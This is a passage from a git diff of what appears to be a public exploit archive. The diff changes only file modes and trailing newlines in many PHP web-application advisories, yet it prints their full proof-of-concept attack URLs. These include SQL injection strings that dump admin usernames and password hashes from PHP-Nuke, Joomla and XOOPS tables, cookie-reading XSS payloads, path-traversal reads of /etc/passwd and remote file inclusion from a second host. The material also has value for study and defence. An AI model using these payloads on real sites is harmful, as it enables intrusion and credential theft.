newline at end of file +http://www.example.com/index.php?pilih=lihatberita&id=-9999999/**/union/**/select/**/0,1,password,3,4,user,6/**/from/**/user/*where%20admin1/** \ No newline at end of file diff --git a/platforms/php/webapps/31291.txt b/platforms/php/webapps/31291.txt old mode 100755 new mode 100644 index 7bddc03e9..91f9e1fee --- a/platforms/php/webapps/31291.txt +++ b/platforms/php/webapps/31291.txt @@ -4,4 +4,4 @@ The Joomla! and Mambo 'com_publication' component is prone to an SQL-injection v Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_publication&task=view&pid=-9999999+union/**/select+0,username,password,0,0,0,0/**/from/**/jos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_publication&task=view&pid=-9999999+union/**/select+0,username,password,0,0,0,0/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31292.txt b/platforms/php/webapps/31292.txt old mode 100755 new mode 100644 index 33cc3d033..6d7ccdf38 --- a/platforms/php/webapps/31292.txt +++ b/platforms/php/webapps/31292.txt @@ -4,4 +4,4 @@ The 'com_blog' component for Joomla! and Mambo is prone to an SQL-injection vuln Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_blog&name=aria-Security.Net&task=view&pid=SQL_INJECTION \ No newline at end of file +http://www.example.com/index.php?option=com_blog&name=aria-Security.Net&task=view&pid=SQL_INJECTION \ No newline at end of file diff --git a/platforms/php/webapps/31293.txt b/platforms/php/webapps/31293.txt old mode 100755 new mode 100644 index 396c70a5f..38061b348 --- a/platforms/php/webapps/31293.txt +++ b/platforms/php/webapps/31293.txt @@ -5,4 +5,4 @@ Gary's Cookbook module for Joomla! and Mambo is prone to an SQL-injection vulner Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+f -rom%2F%2A%2A%2Fmos_users/* \ No newline at end of file +rom%2F%2A%2A%2Fmos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31294.txt b/platforms/php/webapps/31294.txt old mode 100755 new mode 100644 index a22eb2648..5c7ffde8d --- a/platforms/php/webapps/31294.txt +++ b/platforms/php/webapps/31294.txt @@ -4,4 +4,4 @@ The Jokes and Funny Pictures script from Softbiz is prone to an SQL-injection vu Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?sbcat_id=-1 union select 0,1,2,concat(sbadmin_name,0x3a,sbadmin_pwd),4,5,6,7,8,9 from sbjks_admin/* \ No newline at end of file +http://www.example.com/index.php?sbcat_id=-1 union select 0,1,2,concat(sbadmin_name,0x3a,sbadmin_pwd),4,5,6,7,8,9 from sbjks_admin/* \ No newline at end of file diff --git a/platforms/php/webapps/31295.txt b/platforms/php/webapps/31295.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31296.txt b/platforms/php/webapps/31296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31297.txt b/platforms/php/webapps/31297.txt old mode 100755 new mode 100644 index 7a5c558de..e4f371515 --- a/platforms/php/webapps/31297.txt +++ b/platforms/php/webapps/31297.txt @@ -4,4 +4,4 @@ The 'Sell' module for PHP-Nuke is prone to an SQL-injection vulnerability becaus Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/modules.php?name=Sell&d_op=viewsell&cid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202 \ No newline at end of file +http://www.example.com/modules.php?name=Sell&d_op=viewsell&cid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202 \ No newline at end of file diff --git a/platforms/php/webapps/31303.txt b/platforms/php/webapps/31303.txt old mode 100755 new mode 100644 index 6932dbe21..10f08ea5a --- a/platforms/php/webapps/31303.txt +++ b/platforms/php/webapps/31303.txt @@ -4,4 +4,4 @@ The Joomla! and Mambo 'com_inter' component is prone to an SQL-injection vulnera Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_inter&op=The-0utl4wz&id=-11111111111111/**/union/**/select/**/username,1,2,3,password,5,6,7,8,9/**/from/**/jos_user \ No newline at end of file +http://www.example.com/index.php?option=com_inter&op=The-0utl4wz&id=-11111111111111/**/union/**/select/**/username,1,2,3,password,5,6,7,8,9/**/from/**/jos_user \ No newline at end of file diff --git a/platforms/php/webapps/31304.txt b/platforms/php/webapps/31304.txt old mode 100755 new mode 100644 index ad66c5b38..215632ea2 --- a/platforms/php/webapps/31304.txt +++ b/platforms/php/webapps/31304.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects Plume CMS 1.2.2; other versions may be affected as well. -http://www.example.com/manager/xmedia.php?dir=theme/default/<script>alert("XSS")</script>&mode= \ No newline at end of file +http://www.example.com/manager/xmedia.php?dir=theme/default/<script>alert("XSS")</script>&mode= \ No newline at end of file diff --git a/platforms/php/webapps/31315.txt b/platforms/php/webapps/31315.txt old mode 100755 new mode 100644 index 85b2cd3d7..6742a3a4c --- a/platforms/php/webapps/31315.txt +++ b/platforms/php/webapps/31315.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow XRMS CRM 1.99.2 is affected; other versions may also be vulnerable. -http://www.example.com//xrms/admin/users/self.php?msg=Preferences%20successfully%20saved&msg=<script>alert("xss");</script> \ No newline at end of file +http://www.example.com//xrms/admin/users/self.php?msg=Preferences%20successfully%20saved&msg=<script>alert("xss");</script> \ No newline at end of file diff --git a/platforms/php/webapps/31317.txt b/platforms/php/webapps/31317.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31318.txt b/platforms/php/webapps/31318.txt old mode 100755 new mode 100644 index 81a032767..5c0648a94 --- a/platforms/php/webapps/31318.txt +++ b/platforms/php/webapps/31318.txt @@ -8,4 +8,4 @@ This issue affects Centreon 1.4.2.3; other versions may also be vulnerable. http://www.example.com/include/doc/index.php?page=../../www/oreon.conf.php http://www.example.com/include/doc/index.php?page=../../../../../etc/passwd -http://www.example.com/include/doc/index.php?page=[Local File] \ No newline at end of file +http://www.example.com/include/doc/index.php?page=[Local File] \ No newline at end of file diff --git a/platforms/php/webapps/31319.txt b/platforms/php/webapps/31319.txt old mode 100755 new mode 100644 index a93c93425..39c96796b --- a/platforms/php/webapps/31319.txt +++ b/platforms/php/webapps/31319.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects 'gallery' 0.1, 0.3, and 0.4; other versions may also be affected. -http://www.example.com/index.php?gallery=XSS \ No newline at end of file +http://www.example.com/index.php?gallery=XSS \ No newline at end of file diff --git a/platforms/php/webapps/31320.txt b/platforms/php/webapps/31320.txt old mode 100755 new mode 100644 index 2bba561a4..234fbac28 --- a/platforms/php/webapps/31320.txt +++ b/platforms/php/webapps/31320.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to include an arbitrary remote file containin This issue affects phpMyTourney 2; other versions may also be vulnerable. -http://www.example.com/phpmytourney/sources/tourney/index.php?page=[Evil-Script] \ No newline at end of file +http://www.example.com/phpmytourney/sources/tourney/index.php?page=[Evil-Script] \ No newline at end of file diff --git a/platforms/php/webapps/31321.txt b/platforms/php/webapps/31321.txt old mode 100755 new mode 100644 index 01a89ea14..c6d8f544d --- a/platforms/php/webapps/31321.txt +++ b/platforms/php/webapps/31321.txt @@ -4,4 +4,4 @@ Heathco Software h2desk is prone to multiple information-disclosure vulnerabilit Attackers can leverage these issues to obtain potentially sensitive information that can aid in further attacks. -http://www.example.com/index.php?pid=databasedump \ No newline at end of file +http://www.example.com/index.php?pid=databasedump \ No newline at end of file diff --git a/platforms/php/webapps/31322.txt b/platforms/php/webapps/31322.txt old mode 100755 new mode 100644 index f360cd1a9..eef394001 --- a/platforms/php/webapps/31322.txt +++ b/platforms/php/webapps/31322.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc This issue affects gaestebuch 2.2; other versions may also be affected. -http://www.example.com/modules.php?name=gaestebuch_v22&amp;func=edit&amp;id=-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1 \ No newline at end of file +http://www.example.com/modules.php?name=gaestebuch_v22&amp;func=edit&amp;id=-1+union+all+select+1,1,1,aid,pwd+from+nuke_authors+where+radminsuper=1 \ No newline at end of file diff --git a/platforms/php/webapps/31324.txt b/platforms/php/webapps/31324.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31325.txt b/platforms/php/webapps/31325.txt old mode 100755 new mode 100644 index 2c02e1bc6..30373f417 --- a/platforms/php/webapps/31325.txt +++ b/platforms/php/webapps/31325.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to include arbitrary remote files containin KC Wiki 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/kcwiki-1_0-20051129/simplest/wiki.php?page=http://www.example2.com/cmd.txt? \ No newline at end of file +http://www.example.com/kcwiki-1_0-20051129/simplest/wiki.php?page=http://www.example2.com/cmd.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31326.txt b/platforms/php/webapps/31326.txt old mode 100755 new mode 100644 index 111cdb368..61299e42a --- a/platforms/php/webapps/31326.txt +++ b/platforms/php/webapps/31326.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues determine valid usernames and passwords vi These issues affect Flyspray 0.9.9 to 0.9.9.4. -http://www.example.com/index.php?do=myprofile&tasks_perpage=<script>alert('DSecRG XSS')</script> http://www.example.com/index.php?do=myprofile&time_zone=<img src="javascript:alert('DSecRG XSS')"> http://www.example.com/index.php?do=admin&area=newproject&anon_open=<img src="javascript:alert('DSecRG XSS')"> http://www.example.com/index.php?do=admin&area=cat&rgt[4]=<script>alert('DSecRG XSS')</script> http://www.example.com/index.php?do=pm&area=prefs&project_is_active=<img src="javascript:alert('DSecRG XSS')"> http://www.example.com/index.php?do=details&project_id=<script>alert('DSecRG XSS')</script> http://www.example.com/index.php?do=details&item_status=<img src="javascript:alert('DSecRG XSS')"> http://www.example.com/index.php?do=details&item_summary=<script>alert('DSecRG XSS')</script> \ No newline at end of file +http://www.example.com/index.php?do=myprofile&tasks_perpage=<script>alert('DSecRG XSS')</script> http://www.example.com/index.php?do=myprofile&time_zone=<img src="javascript:alert('DSecRG XSS')"> http://www.example.com/index.php?do=admin&area=newproject&anon_open=<img src="javascript:alert('DSecRG XSS')"> http://www.example.com/index.php?do=admin&area=cat&rgt[4]=<script>alert('DSecRG XSS')</script> http://www.example.com/index.php?do=pm&area=prefs&project_is_active=<img src="javascript:alert('DSecRG XSS')"> http://www.example.com/index.php?do=details&project_id=<script>alert('DSecRG XSS')</script> http://www.example.com/index.php?do=details&item_status=<img src="javascript:alert('DSecRG XSS')"> http://www.example.com/index.php?do=details&item_summary=<script>alert('DSecRG XSS')</script> \ No newline at end of file diff --git a/platforms/php/webapps/31328.txt b/platforms/php/webapps/31328.txt old mode 100755 new mode 100644 index 38f7aa1ab..bacbe53c3 --- a/platforms/php/webapps/31328.txt +++ b/platforms/php/webapps/31328.txt @@ -9,4 +9,4 @@ NOTE: This BID was previously titled 'TorrentTrader 'msg' Parameter Cross Site S TorrentTrader Classic 1.08 is affected; other versions may also be vulnerable. -http://www.example.com/account-inbox.php?msg=<script>alert(document.co­okie)</script>&receiver=<username> \ No newline at end of file +http://www.example.com/account-inbox.php?msg=<script>alert(document.co­okie)</script>&receiver=<username> \ No newline at end of file diff --git a/platforms/php/webapps/31331.txt b/platforms/php/webapps/31331.txt old mode 100755 new mode 100644 index 005a340be..83f947d7c --- a/platforms/php/webapps/31331.txt +++ b/platforms/php/webapps/31331.txt @@ -4,4 +4,4 @@ The eGallery module for PHP-Nuke is prone to an SQL-injection vulnerability beca Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/modules.php?name=eGallery&file=index&op=showpic&pid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202 \ No newline at end of file +http://www.example.com/modules.php?name=eGallery&file=index&op=showpic&pid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202 \ No newline at end of file diff --git a/platforms/php/webapps/31332.txt b/platforms/php/webapps/31332.txt old mode 100755 new mode 100644 index 5f0211b5d..9a9c013c7 --- a/platforms/php/webapps/31332.txt +++ b/platforms/php/webapps/31332.txt @@ -4,4 +4,4 @@ The PHP-Nuke 'Seminars' module is prone to a local file-include vulnerability be Exploiting this issue may allow an unauthorized remote user to view files and execute local scripts in the context of the webserver process. -http://www.example.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/31335.txt b/platforms/php/webapps/31335.txt old mode 100755 new mode 100644 index 6dbf71479..962951d9b --- a/platforms/php/webapps/31335.txt +++ b/platforms/php/webapps/31335.txt @@ -4,4 +4,4 @@ MG2 is prone to a cross-site scripting vulnerability because it fails to adequat An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/admin.php?action=import&list=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file +http://www.example.com/admin.php?action=import&list=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/31337.txt b/platforms/php/webapps/31337.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31339.txt b/platforms/php/webapps/31339.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3134.php b/platforms/php/webapps/3134.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31341.txt b/platforms/php/webapps/31341.txt old mode 100755 new mode 100644 index 49e9a4b6e..3281fafd5 --- a/platforms/php/webapps/31341.txt +++ b/platforms/php/webapps/31341.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th Versions prior to Yap Blog 1.1.1 are vulnerable. -http://www.example.com/[path]/index.php?page=[Sh3llAddress] \ No newline at end of file +http://www.example.com/[path]/index.php?page=[Sh3llAddress] \ No newline at end of file diff --git a/platforms/php/webapps/31350.txt b/platforms/php/webapps/31350.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31351.txt b/platforms/php/webapps/31351.txt old mode 100755 new mode 100644 index 6e6dc984b..1fd2b7416 --- a/platforms/php/webapps/31351.txt +++ b/platforms/php/webapps/31351.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc http://www.example.com/modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,aid,3,4,5+from+nuke_authors http://www.example.com/modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,pwd,3,4,5+from+nuke_authors -http://www.example.com/modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,email,3,4,5+from+nuke_authors \ No newline at end of file +http://www.example.com/modules.php?name=modload&name=4nChat&file=index&roomid=-2+union+select+1,email,3,4,5+from+nuke_authors \ No newline at end of file diff --git a/platforms/php/webapps/31352.txt b/platforms/php/webapps/31352.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31353.txt b/platforms/php/webapps/31353.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31354.txt b/platforms/php/webapps/31354.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31355.txt b/platforms/php/webapps/31355.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31356.txt b/platforms/php/webapps/31356.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31357.txt b/platforms/php/webapps/31357.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31358.txt b/platforms/php/webapps/31358.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31365.txt b/platforms/php/webapps/31365.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31366.txt b/platforms/php/webapps/31366.txt old mode 100755 new mode 100644 index ccdc13ecc..1b6314ac6 --- a/platforms/php/webapps/31366.txt +++ b/platforms/php/webapps/31366.txt @@ -13,4 +13,4 @@ isLogfile.0=true&isLogfile.0.value=true&enabled.0=true&enabled.0.value=true &elementname=undefined&page=page1&style=new &path=%252Fworkplace%252Flogfileview%252FlogfileViewSettings &elementindex=0&framename=admin_content&windowSize.0=8000&fileEncoding.0=UTF-8 -&filePath.0=%2Fetc%2Fpasswd \ No newline at end of file +&filePath.0=%2Fetc%2Fpasswd \ No newline at end of file diff --git a/platforms/php/webapps/31367.txt b/platforms/php/webapps/31367.txt old mode 100755 new mode 100644 index 28186c7cb..c0693d072 --- a/platforms/php/webapps/31367.txt +++ b/platforms/php/webapps/31367.txt @@ -5,4 +5,4 @@ BM Classifieds is prone to multiple SQL-injection vulnerabilities because it fai Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/* -http://www.example.com/pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,concat(username,0x3a,email),password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, \ No newline at end of file +http://www.example.com/pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,concat(username,0x3a,email),password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, \ No newline at end of file diff --git a/platforms/php/webapps/31368.txt b/platforms/php/webapps/31368.txt old mode 100755 new mode 100644 index b43ca4ba9..cd960041d --- a/platforms/php/webapps/31368.txt +++ b/platforms/php/webapps/31368.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc http://www.example.com/modules.php?name=modload&name=4nAlbum&file=index&do=showpic&pid=-14+union+select+1,2,3,4,5,6,aid,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+nuke_authors http://www.example.com/modules.php?name=modload&name=4nAlbum&file=index&do=showpic&pid=-14+union+select+1,2,3,4,5,6,pwd,8,9,10,11,12,13,14,15,16,17111,18,19,20,21+from+nuke_authors -http://www.example.com/modules.php?name=modload&name=4nAlbum&file=index&do=showpic&pid=-14+union+select+1,2,3,4,5,6,email,8,9,10,11,12,13,14,15,16,17111,18,19,20,21+from+nuke_authors \ No newline at end of file +http://www.example.com/modules.php?name=modload&name=4nAlbum&file=index&do=showpic&pid=-14+union+select+1,2,3,4,5,6,email,8,9,10,11,12,13,14,15,16,17111,18,19,20,21+from+nuke_authors \ No newline at end of file diff --git a/platforms/php/webapps/31369.txt b/platforms/php/webapps/31369.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31370.txt b/platforms/php/webapps/31370.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31371.txt b/platforms/php/webapps/31371.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31372.txt b/platforms/php/webapps/31372.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31373.txt b/platforms/php/webapps/31373.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31374.txt b/platforms/php/webapps/31374.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31375.txt b/platforms/php/webapps/31375.txt old mode 100755 new mode 100644 index 31778d385..c0ecca874 --- a/platforms/php/webapps/31375.txt +++ b/platforms/php/webapps/31375.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an unauthorized user to view files and execute l Drake CMS 0.4.11_RC8 is vulnerable; other versions may also be affected. -http://www.example.com/install/index.php?d_root=/etc/passwd%00 \ No newline at end of file +http://www.example.com/install/index.php?d_root=/etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/31377.txt b/platforms/php/webapps/31377.txt old mode 100755 new mode 100644 index 27a5110d6..4f016e450 --- a/platforms/php/webapps/31377.txt +++ b/platforms/php/webapps/31377.txt @@ -5,4 +5,4 @@ The Hadith module for PHP-Nuke is prone to an SQL-injection vulnerability becaus Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/modules.php?modules.php?modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A -http://www.example.com/modules.php?modules.php?modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A \ No newline at end of file +http://www.example.com/modules.php?modules.php?modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A \ No newline at end of file diff --git a/platforms/php/webapps/31379.txt b/platforms/php/webapps/31379.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31380.txt b/platforms/php/webapps/31380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31382.txt b/platforms/php/webapps/31382.txt old mode 100755 new mode 100644 index 8afc87907..f5ad0de21 --- a/platforms/php/webapps/31382.txt +++ b/platforms/php/webapps/31382.txt @@ -4,4 +4,4 @@ The 'ensenanzas' component for Joomla! and Mambo is prone to an SQL-injection vu Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_ensenanzas&Itemid=71&id=99999/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_ensenanzas&Itemid=71&id=99999/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31383.txt b/platforms/php/webapps/31383.txt old mode 100755 new mode 100644 index 286d7203f..686c0c93e --- a/platforms/php/webapps/31383.txt +++ b/platforms/php/webapps/31383.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc The NukeC30 module 3.0 is affected; other versions may also be vulnerable. -http://www.example.com/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd),2/**/from/**/nuke_authors/*where%20admin%20-2 \ No newline at end of file +http://www.example.com/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd),2/**/from/**/nuke_authors/*where%20admin%20-2 \ No newline at end of file diff --git a/platforms/php/webapps/31384.txt b/platforms/php/webapps/31384.txt old mode 100755 new mode 100644 index c84de10bd..1ecfd87cf --- a/platforms/php/webapps/31384.txt +++ b/platforms/php/webapps/31384.txt @@ -4,4 +4,4 @@ The zClassifieds module for PHP-Nuke is prone to an SQL-injection vulnerability Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/modules.php?ZClassifieds&cat=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/** \ No newline at end of file +http://www.example.com/modules.php?ZClassifieds&cat=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/** \ No newline at end of file diff --git a/platforms/php/webapps/31387.txt b/platforms/php/webapps/31387.txt old mode 100755 new mode 100644 index 2a57cace8..177e7b11c --- a/platforms/php/webapps/31387.txt +++ b/platforms/php/webapps/31387.txt @@ -7,4 +7,4 @@ Exploiting these issues may allow an attacker to access potentially sensitive in Uberghey CMS 0.3.1 is vulnerable; other versions may also be affected. http://www.example.com/uberghey-0.3.1/index.php?page_id=../../../../../../../../../../etc/passwd%00 -http://www.example.com/uberghey-0.3.1/index.php?language=../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/uberghey-0.3.1/index.php?language=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/31388.txt b/platforms/php/webapps/31388.txt old mode 100755 new mode 100644 index c7857a934..cfc44b4cf --- a/platforms/php/webapps/31388.txt +++ b/platforms/php/webapps/31388.txt @@ -7,4 +7,4 @@ Exploiting these issues may allow an attacker to access potentially sensitive in Travelsized CMS 0.4.1 is vulnerale; other versions may also be affected. http://www.example.com/travelsized-0.4.1/index.php?page_id=../../../../../../../../../../etc/passwd%00 -http://www.example.com/travelsized-0.4.1/index.php?language=../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/travelsized-0.4.1/index.php?language=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/31389.txt b/platforms/php/webapps/31389.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31390.txt b/platforms/php/webapps/31390.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31391.txt b/platforms/php/webapps/31391.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31392.txt b/platforms/php/webapps/31392.txt old mode 100755 new mode 100644 index c1bd535cc..1b665f898 --- a/platforms/php/webapps/31392.txt +++ b/platforms/php/webapps/31392.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc My eGallery 3.04 is vulnerable; other versions may also be affected. -http://www.example.com/modules/my_egallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from+xoops_users/* \ No newline at end of file +http://www.example.com/modules/my_egallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from+xoops_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31393.txt b/platforms/php/webapps/31393.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31400.txt b/platforms/php/webapps/31400.txt old mode 100755 new mode 100644 index 1b03608b7..d04203088 --- a/platforms/php/webapps/31400.txt +++ b/platforms/php/webapps/31400.txt @@ -5,4 +5,4 @@ MyTutorials is prone to an SQL-injection vulnerability because it fails to suffi Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass),3,4,5/**/from/**/xoops_users/* -http://www.example.com/modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/* \ No newline at end of file +http://www.example.com/modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31401.txt b/platforms/php/webapps/31401.txt old mode 100755 new mode 100644 index df2840926..a78510e4f --- a/platforms/php/webapps/31401.txt +++ b/platforms/php/webapps/31401.txt @@ -4,4 +4,4 @@ Acyhost is prone to a remote file-include vulnerability because it fails to suff Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/index.php?sayfa=codeinject.txt \ No newline at end of file +http://www.example.com/index.php?sayfa=codeinject.txt \ No newline at end of file diff --git a/platforms/php/webapps/31402.txt b/platforms/php/webapps/31402.txt old mode 100755 new mode 100644 index 745993992..23d73c1d2 --- a/platforms/php/webapps/31402.txt +++ b/platforms/php/webapps/31402.txt @@ -4,4 +4,4 @@ eWeather is prone to a cross-site scripting vulnerability because the applicatio An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://example.net/modules.php?name=eWeather&chart=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://example.net/modules.php?name=eWeather&chart=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/31406.txt b/platforms/php/webapps/31406.txt old mode 100755 new mode 100644 index 27961e908..fd8d5632c --- a/platforms/php/webapps/31406.txt +++ b/platforms/php/webapps/31406.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow SNewsCMS 2.3 and 2.4 are vulnerable to this issue; other versions may also be affected. -http://www.example.com/search.php?query="><h1>XSS</h1> \ No newline at end of file +http://www.example.com/search.php?query="><h1>XSS</h1> \ No newline at end of file diff --git a/platforms/php/webapps/31408.txt b/platforms/php/webapps/31408.txt old mode 100755 new mode 100644 index 8f5e96f91..fb0d98eb8 --- a/platforms/php/webapps/31408.txt +++ b/platforms/php/webapps/31408.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Cfnetgs 0.24 is vulnerable to this issue; other versions may also be affected. 